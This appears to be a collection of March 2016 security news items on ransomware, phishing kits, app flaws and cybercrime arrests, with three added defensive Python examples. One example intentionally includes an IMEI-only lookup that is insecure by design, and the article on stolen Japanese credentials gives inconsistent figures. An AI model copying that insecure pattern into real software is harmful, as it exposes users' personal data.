Another worrying trend observed by ProofPoint is the availability of tax phishing kits that have reached a high level of quality.
These kits are for sale in the main black marketplaces and implement a number of features that allow crooks to avoid detection.
“Sophisticated phishing kits custom-made for tax season dramatically boost threat actors across the spectrum to go after the taxpayers. Whether optimized for mobile (in the case of the fake tax preparation software) or “hiding in plain sight,” these kits are powerful tools for cyber criminals. We even observed a kit correctly using SSL, leveraging the secure form-delivery capabilities of the particular service provider they used. Correctly signed certificates make the phishing sites harder to detect for end users, web browsers, and security providers, giving attackers a leg up during tax season—even with commodity kits.” states ProofPoint.
Taxpayers have to be careful: cyber criminals will do everything they can to steal their money.
6 Charged for Hacking Lottery Terminals to Produce More Winning Tickets
28.3.2016 Hacking
Police have arrested and charged six people with crimes linked to hacking Connecticut state lottery terminals in order to produce more winning tickets than usual.
Prosecutors say all the six suspects are either owners or employees of retail stores that produced a much higher number of winning tickets than the state average, according to the Hartford Courant.
Suspects Hacked Lottery Terminal
The alleged group set up machines to process a flood of tickets at once that caused a temporary display freeze, allowing operators to see which of the tickets about to be dispensed would be winning tickets, cancel the duff ones, and print the good ones.
The hack appears to have exploited some software weaknesses in lottery terminals that not only caused ticket requests to be delayed but also allowed operators to know ahead of time whether a given request would produce a winning ticket.
The actual culprit, in this case, was a game dubbed "5 Card Cash."
The suspects allegedly manipulated automated ticket dispensers to run the 5 Card Cash game, which consists of tickets a user can buy on which playing cards are printed.
If 5 cards form a winning poker hand, then the buyer can cash the tickets based on the hand they received.
Authorities Suspended 5 Card Cash Lottery Game
Authorities had already suspended the 5 Card Cash lottery game in Connecticut last November after discovering that the game was generating more winning tickets than its winning-range parameters should technically have permitted.
The six suspects are:
Vikas Patel, 32, from Windsor
Pranav Patel, 32, from Bloomfield
Sedat Kurutan from Naugatuck
Moinuddin Saiyed from Norwalk
Prakuni Patel from Wallingford
Rahul Gandhi from Wallingford
Pranav Patel and Vikas Patel were arrested on Friday, March 19, while the rest were taken into custody between February 29 and March 7.
The charges filed against Vikas and Pranav include first-degree felony counts of larceny and computer crime as well as felony charges of rigging a game. Both have been released on $25,000 bonds each and are scheduled to appear in court on Monday.
Investigators for the Department of Consumer Protection and the Connecticut Lottery say that many clerks were abusing lottery terminals to obtain more winning tickets, which they would later cash in for themselves, and that more arrests may be made in the future.
PowerWare ransomware, a new fileless threat in the wild
28.3.2016 Virus
Experts at Carbon Black spotted in the wild a new threat dubbed PowerWare ransomware that exploits PowerShell, the native Windows framework.
Authors of ransomware are implementing new features to make their malware even more dangerous and effective. Yesterday I wrote about the new Petya ransomware, which overwrites the MBR and causes a blue screen of death; now I will introduce a threat targeting the healthcare industry.
The new ransomware is called PowerWare and was discovered a week ago by security researchers at the Carbon Black firm.
The most interesting feature of the PowerWare ransomware is that it is fileless. Many malware strains in the wild are fileless, including one of the variants of the popular Angler Exploit Kit, but this feature is rare in ransomware.
The criminal gangs behind PowerWare spread it via spam messages carrying a Word document attachment purporting to be an invoice. The attackers use an old trick to convince victims to enable macros: the document asks them to enable macros in order to view it correctly.
The macro runs cmd.exe, which launches PowerShell, the native Windows framework that uses a command-line shell to perform a variety of tasks.
Using PowerShell allows the ransomware to avoid writing files to disk, which makes detection harder. PowerShell also does the actual work of encrypting the files on the victim’s PC.
“The macros are there to launch PowerShell and pull down the ransomware script. Lots of malware can be distributed via macros in Word docs. Most of the time they download additional binaries to do more bad stuff (backdoors, etc.),” Valdez said.
“This does not pull down any additional binaries (executables), and leverages PowerShell (already on the system and approved to be there) to do the dirty work.”
“This means no ‘traditional’ malware – no additional executable needed – just a text document (script).”
The PowerShell ransomware asks victims to pay a $500 ransom to restore the encrypted files. In this case too, the ransom doubles if the victim does not meet the deadline.
Fileless ransomware could rapidly become popular in the criminal ecosystem: on March 11, researchers at Palo Alto Networks spotted a new malware family called PowerSniff that has many similarities with PowerWare, including the fileless capability.
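The infection chain described above (Word macro, then cmd.exe, then PowerShell) is what an endpoint detection rule would key on, since no new executable is written to disk. The following is an added example, not Carbon Black's or the page's code: it walks parent-process relationships in process-creation telemetry and flags any PowerShell whose ancestry leads back to an Office application, tolerating an intermediate shell. The event records and field names (pid, ppid, image, cmdline) are constructed and are not any vendor's schema.

```python
"""Flag PowerShell processes spawned, directly or via cmd.exe, by an Office app.

Added example (not from Carbon Black or the article). Telemetry below is
constructed; the ProcEvent fields are an assumed, vendor-neutral shape.
"""
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str       # executable file name; compared case-insensitively
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe"}                      # tolerated intermediaries in the chain
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent], max_depth: int = 8) -> List[str]:
    """Image names from the process itself up towards the root (bounded depth)."""
    chain = [ev.image.lower()]
    cur = ev
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:
            break
        chain.append(parent.image.lower())
        cur = parent
    return chain


def office_spawned_powershell(events: List[ProcEvent]) -> List[ProcEvent]:
    """Return PowerShell events whose nearest non-shell ancestor is an Office app."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if ev.image.lower() not in POWERSHELL:
            continue
        for img in ancestry(ev, by_pid)[1:]:   # skip the process itself
            if img in SHELLS:
                continue                       # cmd.exe in between is still suspicious
            if img in OFFICE_APPS:
                hits.append(ev)
            break                              # first non-shell ancestor decides
    return hits


# Constructed sample telemetry: one macro-driven chain and one benign admin shell.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "WINWORD.EXE", '"WINWORD.EXE" invoice.doc'),
    ProcEvent(300, 200, "cmd.exe", "cmd.exe /c powershell.exe"),
    ProcEvent(400, 300, "powershell.exe", "powershell.exe"),
    ProcEvent(500, 100, "powershell.exe", "powershell.exe -File backup.ps1"),
]


def detect_sample() -> List[int]:
    """PIDs flagged in the constructed sample; only the macro chain should match."""
    return [e.pid for e in office_spawned_powershell(SAMPLE_EVENTS)]


if __name__ == "__main__":
    print(detect_sample())
```

The rule deliberately stops at the first ancestor that is not a plain shell: an administrator's PowerShell started from Explorer is not reported, while the same binary reached through WINWORD.EXE and cmd.exe is.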
Nuclear Plants in Germany Are Vulnerable to Terrorism Threats
28.3.2016 Vulnerability
According to a recent report, German nuclear plants are vulnerable to terrorists and the problem needs to be addressed seriously.
According to the recently released report, Germany is not adequately equipped to prevent terrorist attacks on its nuclear plants.
According to the Deutsche Presse-Agentur (DPA) news agency, the report was presented by Oda Becker, an independent expert on nuclear plants.
This is of course extremely distressing, especially in the light of the recent tragic events in Belgium with substantial casualties.
The report was brought to public attention at the congress of the German Federation for the Environment and Nature Conservation (BUND), where concerns were expressed about protecting citizens from the catastrophic consequences of another terrorist attack.
If an aircraft is flown into a plant, there is little the plant’s defences can do to prevent the inevitable.
The same level of threat applies to helicopters loaded with explosives. There is nothing to prevent such acts, which would cause massive destruction and widespread radiation.
Terrorism is one of the major threats to the nuclear power industry, making these facilities among the most high-profile targets.
“A serious accident is possible in case of every German nuclear plant,” Becker explained in a separate study published on March 8 and titled “Nuclear power 2016 – secure, clean, everything under control?”
Becker considers insufficient security standards, natural disasters, terrorist attacks and emergencies caused by the deterioration of the German nuclear plants’ security systems as major threats to the industry.
“There are no appropriate accident management plans,” Becker added. “The interim [nuclear waste] storages lack protection against aircraft crashes and dangers posed by terrorists,” she said.
Belgian media have focused on the terrorists’ original plan to hit nuclear plants. Had it not been for the arrest in Paris, that plan would have become reality and the casualties would have been even greater. Dernière Heure, a Belgian newspaper, revealed that the terrorists had planted a camera in front of the house of the director of the Belgian nuclear research program and gained a lot of information that way.
All these events have made a lot of people skeptical as to the importance of shutting down nuclear plants. The head of BUND, Hubert Weiger, has said:
“It is even more necessary than ever to abandon this technology,” and this thought reflects the opinions of thousands in Germany, Belgium and Europe altogether.
AP has reported that IS (or ISIS) has been training hundreds of people specifically for external attacks, a threat beyond any control. About 450 of them are specialists in making bombs, worsening the situation for Europe.
If people in Germany and Belgium do not take immediate actions, who knows what can happen next?
Corporate spies strike: it could be the cleaner or the mail-room courier
28.3.2016 Espionage
It is far easier to get into a company as a lower-level employee, for example as a janitor or a mail-room clerk, where the requirements are much lower, yet the spy still receives the proverbial keys to the kingdom.
Some information spies go through the hiring process to get into a company and steal corporate secrets for a competitor or a foreign state. Others turn against their employer when they become angry and leave, or when they are lured away by other job offers. Can such insiders be detected in time?
Companies try to uncover internal traitors, but restricting their access to sensitive data may not be enough. With the right job position and access, agents posing as cleaners, mail-room staff or IT personnel can bypass data protections thanks to their broad access and carry valuable intellectual property out.
What can security managers do, technically and otherwise, to protect valuable data from snoops?
Getting in
Corporate spies coming from other organisations usually meet the requirements of the job in question well, but their intentions remain hidden. Completely eliminating the risk that someone works for a competitor may be difficult to impossible, and perhaps even undesirable, since there is an interest in hiring staff with experience from competitors.
“Competitors’ employees have the skills, market intelligence and experience a company needs, so they are in fact first-choice candidates,” says Sol Cates, chief security officer at Vormetric.
Competitors also bribe previously loyal employees to obtain your data through them, and poach them to gain market advantages.
Many companies try to do simple checks of employment history and references, but do not devote enough effort to uncovering possible ulterior motives.
“Even some contractors of government organisations who routinely work with classified information rely solely on a background check via a security clearance and do no further checks,” says Philip Becnel, director of Dinolt, Becnel, & Wells Investigative Group.
That level of investigation is not enough, though, because corporate spies who are loyal to their country or their original employer, not the current one, will share classified data with other parties.
Companies can run legal background checks on an applicant to verify, for instance, whether a previous employer sued the candidate over theft of corporate data and intellectual property.
“But that only helps if the applicant has committed corporate espionage before and the former employer caught them at it,” Cates explains.
Once a company hires a candidate, it should use access-control technologies at both the physical and IT level, shred documents, and introduce monitoring that would uncover corporate spies and protect against them. There are still many shortcomings in this area.
Getting to the corporate crown jewels
Corporate espionage agents slip through the gaps between the typical components of most background checks. A company checks employment history, the criminal record and traffic-offence records.
All of this, however, concerns what the candidate once did, not what they want to do now. “It is not like a polygraph test or another metric a company could use when vetting people applying for sensitive government jobs,” Cates says.
Perpetrators of corporate espionage can also get close to data through the least scrutinised jobs that are still advantageous for espionage. “It is far easier to get into a company as a lower-level employee, for example as a janitor or a mail-room clerk, where the requirements are much lower and the spy still gets the proverbial keys to the kingdom,” Becnel explains.
Recruiting someone already working at the target company is even easier than pushing a spy through the hiring process. “It is also very hard for a company to catch someone who is already inside and already enjoys a certain level of trust,” says Becnel.
“It is common for competitors to contact disgruntled employees, offer them a job for better pay and ask them to take all sensitive data with them when they leave,” Becnel says. Such employees can access electronic data or simply record internal meetings and phone calls with a smartphone.
When recruiting existing employees, the biggest prize is often an IT professional who has full access to all data and whom the company does not monitor. “Some of the largest espionage operations have been carried out by IT staff,” says Cates.
Keeping them out…
Deep and thorough background checks are a good start in protecting companies against unwittingly hiring an agent who works for a competitor or a foreign state, even for lower-level positions.
Remotely Exploitable Flaw in Truecaller Leaves 100 Million Android Devices Vulnerable
27.3.2016 Vulnerability
Security researchers from the Cheetah Mobile Security Research Lab discovered a severe flaw in the call management application Truecaller.
Recently, security researchers from the Cheetah Mobile Security Research Lab discovered a severe loophole in the popular phone call management application Truecaller.
This vulnerability allows anyone to steal Truecaller users’ sensitive information, potentially opening doors for attackers. Overall, more than 100 Million Android users who have downloaded this app on their smartphones are in danger.
The researchers found that Truecaller uses the device’s IMEI as the sole identifier of its users. This means that anyone who obtains the IMEI of a device can retrieve that Truecaller user’s personal information (including phone number, home address, mailbox, gender, etc.) and tamper with the app’s settings without the user’s consent, exposing them to malicious phishers.
By exploiting this flaw, attackers can:
Steal personal information such as account name, gender, e-mail, profile picture, home address, etc.
Modify a user’s application settings:
Disable spam blockers
Add entries to a user’s blacklist
Delete a user’s blacklist
The Cheetah Mobile Security Research Team notified the developer of Truecaller about this vulnerability as soon as they discovered the loophole and offered all it could to help the developer fix the issue. Now the maker of Truecaller has addressed the issue and released an update on March 22nd.
Although the flaw has been fixed in the latest version, the majority of users are still in danger because they have not yet received the new release. The CM Security Research Lab advises Truecaller users to upgrade the app to the latest version as soon as possible.
Written by Cheetah Mobile Security Research Lab
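The root cause above is a device label being treated as a credential. The IMEI is not secret (it is printed on the box and readable by other apps), so a server that keys profile reads and settings writes on it alone authenticates nobody. The following added example, which is not Truecaller's or Cheetah Mobile's code, contrasts that vulnerable pattern with a hardened one in which the IMEI stays a plain label and a random per-device token, issued once at registration and stored hashed, is what authenticates requests. The API shape, the in-memory stores and the sample IMEI are assumptions constructed for the example.

```python
"""Identifier versus authenticator: the pattern behind the Truecaller flaw.

Added example, not the app's or the researchers' code. Stores are in-memory
dicts standing in for a backend; the IMEI value is constructed.
"""
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Constructed sample profile keyed by IMEI (the label both designs share).
PROFILES: Dict[str, Dict[str, str]] = {
    "356938035643809": {"name": "alice", "email": "alice@example.test",
                        "spam_blocker": "on"},
}


# --- Vulnerable design: knowing the IMEI is enough to read and write -------
def get_profile_vulnerable(imei: str) -> Optional[Dict[str, str]]:
    """Anyone who learns the IMEI gets the profile."""
    return PROFILES.get(imei)


def set_setting_vulnerable(imei: str, key: str, value: str) -> bool:
    """Anyone who learns the IMEI can, e.g., turn the spam blocker off."""
    profile = PROFILES.get(imei)
    if profile is None:
        return False
    profile[key] = value
    return True


# --- Hardened design: IMEI is a label, a random device token authenticates ---
DEVICE_TOKENS: Dict[str, str] = {}   # imei -> sha256(token); never the raw token


def _hash(token: str) -> str:
    return hashlib.sha256(token.encode()).hexdigest()


def register_device(imei: str) -> str:
    """Run once at install over TLS; the app keeps the returned secret."""
    token = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
    DEVICE_TOKENS[imei] = _hash(token)
    return token


def _authenticated(imei: str, token: str) -> bool:
    expected = DEVICE_TOKENS.get(imei)
    # constant-time comparison so timing does not leak how many bytes matched
    return expected is not None and hmac.compare_digest(expected, _hash(token))


def get_profile_hardened(imei: str, token: str) -> Optional[Dict[str, str]]:
    if not _authenticated(imei, token):
        return None
    return PROFILES.get(imei)


def set_setting_hardened(imei: str, token: str, key: str, value: str) -> bool:
    if not _authenticated(imei, token):
        return False
    profile = PROFILES.get(imei)
    if profile is None:
        return False
    profile[key] = value
    return True


if __name__ == "__main__":
    imei = "356938035643809"
    print("vulnerable read:", get_profile_vulnerable(imei))
    tok = register_device(imei)
    print("hardened read without token:", get_profile_hardened(imei, "guess"))
    print("hardened read with token:", get_profile_hardened(imei, tok))
```

The settings changes listed above (disabling the spam blocker, editing the blacklist) go through the same check in the hardened version, so an IMEI leaked from another app or a screenshot no longer grants write access.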
PETYA ransomware overwrites MBR causing a blue screen of death
27.3.2016 Virus
The Petya ransomware causes a blue screen of death (BSoD) by overwriting the MBR and leaves a ransom note at system startup.
Ransomware is one of the most dangerous threats of this first part of the year. Recently, experts at Trend Micro have spotted a new malicious code dubbed Petya (RANSOM_PETYA.A) that overwrites the MBR to lock users out of the infected machines.
Petya overwrites the MBR of the hard drive, causing Windows to crash. When the victim tries to reboot the PC, it is impossible to load the OS, even in Safe Mode.
Users turning on the computer are shown a flashing red and white screen with a skull-and-crossbones instead.
“As if encrypting files and holding them hostage is not enough, cybercriminals who create and spread crypto-ransomware are now resorting to causing blue screen of death (BSoD) and putting their ransom notes at system startup—as in, even before the operating system loads.” states the post published by Trend Micro.
“Imagine turning on your computer and instead of the usual Windows icon loading, you get a flashing red and white screen with a skull-and-crossbones instead.”
Another interesting aspect of the Petya is the delivery mechanism used by crooks that relies on legitimate cloud storage services like Dropbox.
“this is the first time (in a long time) that leads to crypto-ransomware infection. It is also a departure from the typical infection chain, wherein the malicious files are attached to emails or hosted in malicious sites and delivered by exploit kits.” continues the post.
Victims receive an email that appears to be from an applicant seeking a position in the company; it includes a link to a Dropbox folder that supposedly contains the applicant's CV.
The experts explained that in one of the samples they analyzed, the Dropbox folder contained two files: a self-extracting executable file that purports to be the CV, and a photo of the applicant.
The researchers discovered that the photo is a stock image.
The self-extracting executable is used to drop a Trojan onto the victim's machine. The malware first disables any antivirus programs installed, then downloads and executes the Petya ransomware.
The following image shows the instructions the Petya ransomware gives victims in order to pay the ransom and restore the encrypted files.
The instructions include a link to the Tor Project and explain how to download the Tor Browser to visit a page where the decryption key to restore the data can be purchased.
The crooks behind the Petya ransomware demand a payment of 0.99 Bitcoins (nearly US$430), and the price doubles if the payment is not completed within a deadline.
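As an added defender-side example (not from Trend Micro or the original article), the following Python script shows how an administrator can baseline a disk's first sector and later detect the kind of MBR overwrite Petya performs. Both 512-byte sector images are constructed in memory, so it runs offline; on a real host the bytes would be read from the raw disk device and the baseline stored out-of-band.

```python
"""Baseline-and-compare integrity check of a disk's first sector (the MBR).

Constructed example: the two sector images at the bottom are built in memory.
An MBR-overwriting payload typically replaces the bootstrap code while leaving
the partition table intact, so the check hashes the two regions separately.
"""
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 440           # bytes 0..439: bootstrap code (440..445: disk signature/reserved)
PART_TABLE_OFF = 446          # four 16-byte partition entries follow
BOOT_SIGNATURE = b"\x55\xAA"  # bytes 510..511 mark a valid MBR


def parse_mbr(mbr: bytes) -> dict:
    """Split a 512-byte sector into boot-code hash, used partition entries and signature state."""
    if len(mbr) != SECTOR_SIZE:
        raise ValueError("MBR must be exactly %d bytes" % SECTOR_SIZE)
    partitions = []
    for i in range(4):
        off = PART_TABLE_OFF + 16 * i
        # entry layout: status, 3 CHS bytes, type, 3 CHS bytes, LBA start, sector count (little endian)
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", mbr, off)
        if ptype != 0:  # partition type 0 means the slot is unused
            partitions.append({"bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": sectors})
    return {
        "boot_code_sha256": hashlib.sha256(mbr[:BOOT_CODE_LEN]).hexdigest(),
        "partitions": partitions,
        "signature_ok": mbr[510:512] == BOOT_SIGNATURE,
    }


def compare_to_baseline(current: bytes, baseline: bytes) -> list:
    """Return human-readable findings; an empty list means the sector matches the baseline."""
    cur, base = parse_mbr(current), parse_mbr(baseline)
    findings = []
    if not cur["signature_ok"]:
        findings.append("boot signature 0x55AA missing: sector is not a valid MBR")
    if cur["boot_code_sha256"] != base["boot_code_sha256"]:
        findings.append("boot code replaced (hash %s..., expected %s...)"
                        % (cur["boot_code_sha256"][:12], base["boot_code_sha256"][:12]))
    if cur["partitions"] != base["partitions"]:
        findings.append("partition table differs from baseline")
    return findings


def build_sample_mbr(boot_code: bytes, partitions: list) -> bytes:
    """Assemble a constructed sector from boot code and (status, type, lba_start, sectors) tuples."""
    sector = bytearray(SECTOR_SIZE)
    sector[:len(boot_code)] = boot_code
    for i, (status, ptype, lba, count) in enumerate(partitions):
        struct.pack_into("<B3xB3xII", sector, PART_TABLE_OFF + 16 * i, status, ptype, lba, count)
    sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)


# Constructed "known good" sector: a stand-in bootstrap stub and one bootable NTFS partition.
BASELINE_MBR = build_sample_mbr(b"\x33\xC0\x8E\xD0\xBC\x00\x7C" + b"\x90" * 20,
                                [(0x80, 0x07, 2048, 1_024_000)])
# Constructed tampered sector: boot code swapped out, partition table untouched, so the
# disk layout still looks normal while the machine no longer boots into Windows.
TAMPERED_MBR = build_sample_mbr(b"\xFA\xB8\x00\x00" + b"\xCC" * 60,
                                [(0x80, 0x07, 2048, 1_024_000)])

if __name__ == "__main__":
    for name, sector in (("baseline", BASELINE_MBR), ("tampered", TAMPERED_MBR)):
        print(name, "->", compare_to_baseline(sector, BASELINE_MBR) or ["OK: matches baseline"])
```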
VNC Roulette, a web roulette for random easy to hack PCs
27.3.2016 Hacking
The VNC Roulette service is exposing on the Internet thousands of computer systems using insecure and easy to hack VNC connections.
CCTV surveillance cameras, medical equipment, electricity generators, desktops, home alarm equipment and many other systems are not properly protected and open on the Internet.
Now a website named VNC Roulette is offering random access to these computer systems through the VNC software.
VNC is a very popular application that allows remote access and control of desktops over the networks. A lot of people simply use it to remotely access their computer placed elsewhere. Crucially, though, these connections should be secured with passwords and encryption.
The problem is that many VNC connections are not secured with passwords or encryption, leaving them open to criminals and hackers.
The newborn VNC Roulette website takes screenshots of insecure VNC connections, and it has already gathered images from about 550 systems open on the Internet. It is disconcerting to see people's privacy violated in such a simple way: VNC Roulette reveals users browsing Facebook, accessing personal email accounts, or operating a SCADA system.
The snaps have been taken since 2015; some were taken this month, and the systems are still up and running.
After the media covered VNC Roulette, it went offline, but yesterday the service reappeared online.
Below some samples shared online by El Reg.
An X-ray machine in Nevada, US:
A store’s CCTV system in China:
VNC Roulette demonstrates the importance of properly securing any connection to a system exposed on the Internet. It is very easy for hackers to gain access to systems like the ones captured by the VNC Roulette service.
Don't waste time: implement proper authentication on your systems, use strong passwords, only accept connections from specific IP addresses and, of course, tunnel VNC connections over SSH.
Don't forget that crooks have many other ways to locate vulnerable machines on the Internet, such as the search engines Shodan and Censys.
A dangerous Trojan horse lurks on adult websites. It wants to steal your savings
27.3.2016 Viruses
Smartphones and tablets grow more popular year after year, and many users use them not only to access the Internet but also to watch films and other videos. This is exactly what cyber criminals are trying to exploit by disguising a Trojan horse as an update of the popular Flash Player.
The Marcher Trojan can rob smartphone and tablet owners of their money. (Illustration photo)
The uninvited guest is called Marcher and usually hides on websites with erotic content. The attack almost always proceeds the same way: when the user tries to play a video, they are prompted to update Flash Player, but instead of the update they download the Trojan to their device.
Marcher hides most often on porn sites. It can, however, be spread the same way through sites for watching viral videos and for distributing pirated copies of films and TV series.
Links to the fake sites are often distributed via unsolicited e-mails, but they can also arrive on a smartphone by SMS.
It targets Android
Security experts at Zscaler have so far caught this Trojan on devices running Android. It cannot be ruled out, however, that it will also appear on tablets and smartphones built on other platforms.
Users do not even notice that their device has been infected, because at first glance the Trojan does nothing and merely waits for its opportunity. When the user tries to download an app through the official Google Play app, a fake window pops up asking them to enter payment card details.
The problem is that Marcher can attach itself this way even to genuinely legitimate apps that contain no malicious code. All it needs is to create a fraudulent page asking for payment card details. When users fill it in, they hand the fraudsters a direct ticket to their bank account.
It also bypasses confirmation SMS messages
Interestingly, this insidious Trojan can itself prompt the user to install an app. The download link may arrive, for example, as an MMS message that Marcher itself creates. The installation recommendation may again point to a legitimate program; the uninvited guest is once more only trying to phish the card's security details.
Once Marcher has nested in a smartphone, it can also intercept the confirmation SMS messages that some online transactions require.
The first version of the Marcher Trojan was uncovered back in 2013. Since then cyber criminals have continually improved it into its current form, which terrorizes users of Android smartphones and tablets.
USB Thief malware leaves no traces and needs no Internet
27.3.2016 Viruses
Yesterday, Milan Šurkala, news
ESET has discovered new malware that can steal data without spreading over the Internet. It is installed on a USB flash drive and is essentially undetectable for the computer. It abuses portable versions of various applications.
A new nasty piece of malware called USB Thief (more precisely Win32/PSW.Stealer.NAI and Win32/TrojanDropper.Agent.RFT) has appeared, identified by ESET. It can attack even computers that are not connected to the Internet, because it needs only a USB flash drive to do its work. It does not spread on its own; it is deliberately "installed" on a USB drive, and its task is to pull data from a specific targeted computer. Unlike common malware it does not use autorun techniques but grafts itself as a dynamic library onto portable versions of applications such as Notepad++, Firefox or TrueCrypt. When that program is launched from the USB stick, USB Thief launches too.
Its danger lies in advanced disguise techniques. Some files are encrypted with AES-128, and the key is derived from a combination of properties of the USB stick (its ID and others), so the key is unique to each USB drive. Other files are named after the SHA512 hash of the first few bytes of the given file, again unique to each copy of the malware.
The malware knows which process it should run under, and if that does not match (e.g. it is running in a debugger), it terminates. It is therefore hard to detect with antivirus programs, and it also detects known antivirus products. If everything passes, it pulls the requested data based on its configuration files and stores it on the USB drive. It leaves no traces on the computer itself, since it runs from the flash drive. So if someone with dishonest intentions deliberately plants an infected USB flash drive on a target, they can get at sensitive data (of course the attacker must get the drive back). It is therefore important to be careful which USB drives one uses and where they come from.
Facebook's latest feature Alerts You if Someone Impersonates Your Profile
26.3.2016 Social Site
Online harassment has been taken a step further with the advent of popular social networks like Facebook.
Cyber stalkers create fake profiles impersonating other Facebook users and act on their behalf until the owners notice the fake profiles and manually report them to Facebook.
In some cases, cyber stalkers even block the Facebook account holders they impersonate, so they can carry out mischief through the fake profiles without being detected by the actual account holders.
But now, online criminals can no longer fool anyone with the impersonation method, as Facebook is working on a feature that automatically informs its 1.6 billion users about cloned accounts.
If the company detects a duplicate Facebook account of a user, it will automatically send an alert to the original account holder, who will be prompted to say whether the profile in question is indeed a fake profile impersonating them or whether it actually belongs to someone else.
How would Facebook identify the Clone Profiles?
The new feature would reportedly inform Facebook users about their cloned accounts when it finds a perfect match of both profile pictures and profile names.
However, it seems likely that Facebook would use its face recognition technology, one of the world's best, to identify fake profiles.
While uploading a group pic of you with your friends, you might have noticed how Facebook automatically detects your friend's face and suggests the correct names without manually feeding into it.
This face recognition technology could be used by Facebook's new feature to eliminate the chance of profile duplication and put an end to the doppelganger business.
Here you might be thinking that if 2 accounts are made identical, then how would Facebook identify the legit user? Right?
This difference would be decided by Facebook's core security team by analyzing and comparing the user's activities and date of account creation.
But one question still remains in my head:
If Facebook identifies the difference on the basis of account creation, then what if someone creates a fake profile of a user who hasn't joined the network yet?
Okay, Facebook cannot stop this, as the company cannot compare the fake user to an original user who doesn't exist on its platform.
But what if the user joins the network later? Whom would Facebook notify in that case? The stalker who owns the fake profile, since it was created first?
I have already reached out to Facebook for a comment and will update the article as soon as I get to hear from it.
Why is Impersonation Dangerous?
According to the Facebook Head of Global Safety Antigone Davis, impersonation is a source of harassment, particularly for women, on the social media platform, despite Facebook's longstanding policy against it.
"We heard feedback [before] the roundtables and also at the roundtables that this was a point of concern for women," Davis told Mashable. "It's a real point of concern for some women in certain regions of the world where [impersonation] may have certain cultural or social ramifications."
We have seen a plethora of impersonation examples in cases involving Facebook.
Impersonation is a tool in the sextortionist's bag.
Threatening to use women's photos to associate them with prostitution was one trick used by Michael C. Ford, the former US Embassy worker who was sentenced to nearly 5 years in jail after pleading guilty to sextorting, phishing, breaking into email accounts, stealing explicit images and cyberstalking hundreds of women around the world.
Facebook's new security measure would also give a degree of reassurance to women who hesitate to upload their real images to the platform for fear of impersonation.
Facebook has already introduced this new feature to 75% of the World, including India, Brazil, some South American countries and South East Asian zones, where the usage of the social network is prevalent. The feature will be rolled out in November for the rest of the world.
Features Yet to Release!
In parallel, Facebook is also working on two similar technologies: reporting of non-consensual intimate images and a Photo Checkup feature.
Non-consensual intimate image reporting lets users report any nudity on Facebook and additionally offers them the option to identify themselves as the subject of the photo (if so).
The Photo Checkup feature is similar to Facebook's Privacy Dinosaur, which helped users check their privacy settings such as profile info, status info and which apps have the access to the accounts in a single popup window.
Likewise, Photo Checkup is exclusively dedicated to figuring out: Who can view your photos and who cannot!
Facebook is rolling out many security-centric features, which bolster the security and privacy of user information in the virtual world.
Japan – Police discovered 18 Million Stolen login Credentials
26.3.2016 Crime
Japan – The police have found more than 18 million login credentials on a company server, 90% of which belong to customers of Yahoo Japan.
The Japanese newspaper The Yomiuri Shimbun reported that Tokyo's Metropolitan Police Department arrested the president and a number of employees of the Tokyo-based Nicchu Shinsei Corp in November.
The authorities found more than 18 million login credentials on a server of the company; roughly 1.78 million belong to customers of Yahoo Japan (90 percent), with the rest from Twitter, Facebook, the e-commerce company Rakuten and other websites.
In response, Yahoo Japan confirmed that it has reset the passwords of all the affected accounts. The investigators also discovered on the server a hacking tool used to brute-force the target accounts, and they confirmed that the company's servers had also been used to conduct illegal money transfers.
Why did the Japanese company store the login credentials?
The Nicchu Shinsei Corp allegedly offered its services to Chinese hackers, providing stolen credentials and proxy services. The hackers used the login credentials to lure users into visiting fraudulent websites and to steal reward points earned by the victims.
Unfortunately, this isn't the first time the Japanese police have discovered millions of login credentials belonging to Japanese netizens stored on a server. Last year, law enforcement seized a server containing 8 million stolen credentials; in that case too, hackers used the machine as a proxy.
The Japanese criminal underground is growing significantly, even though its underground economy remains highly stealthy.
According to Japan's National Police Agency, cybercriminal activity in the year to March 2015 increased 40% over the previous year. In June 2015, the Japan Pension Service suffered a significant data breach that exposed more than one million users' records.
Researchers still consider Japanese cybercriminal rings newbies: because of the nation's strict criminal laws, Japanese criminals don't write malware, given the severe penalties against such activities.
The experts noticed that the Japanese cybercrime underground is very active in the illegal buying and selling of counterfeit passports, drugs, weapons, stolen credit card data, phone number databases, hacking advice and child pornography.
Japanese criminals are increasingly targeting bank customers with malware-based attacks. In the last year several threats targeting Japanese users were detected by security firms, including Brolux, Rovnix, Neverquest, Tsukuba, and Shifu.
Another worrying phenomenon threatening Japanese users is APT groups: recently the country's critical infrastructure was targeted by the threat actors behind Operation Dust Storm, while another hacker crew dubbed Blue Termite hacked hundreds of organizations in various industries.
New Bill targets Anonymous Prepaid 'Burner' phones by requiring Registration
26.3.2016 Mobil
Terrorist organisations are increasingly using high-grade encryption technologies to avoid being caught by law enforcement. But that was not the case in last year's Paris attacks that killed 129 people, as encryption seems to have played little to no role.
So, Who was the Real Culprit Behind the Attacks?
The 'Burner' Phones.
Burner Phones, or Prepaid mobile phones, are often the quick, easy, and anonymous method of communication.
All you need to do is head to your nearest big-box store and pick up a cheap prepaid "burner" phone and a phone card. Now you have an entirely useable phone with no ID that could reveal your identity.
It seems that these prepaid "burner" phones are a dream tool for terrorist organisations, which buy them in bulk and dispose of each one after a single communication. The same kind of prepaid phones was used in the terrorist attacks in Paris late last year.
By using different phones and mobile phone numbers each time, the terrorists evade the bulk metadata collection programs of Western intelligence agencies, making it hard for law enforcement to catch them.
Crack Down on Prepaid 'Burner' Phones
So, to deal with this issue, Lawmakers in California have proposed a new bill that would force prepaid "burner phone" retailers to record and verify the personal identification of buyers upon purchase of prepaid phones or similar mobile devices, as well as SIM cards.
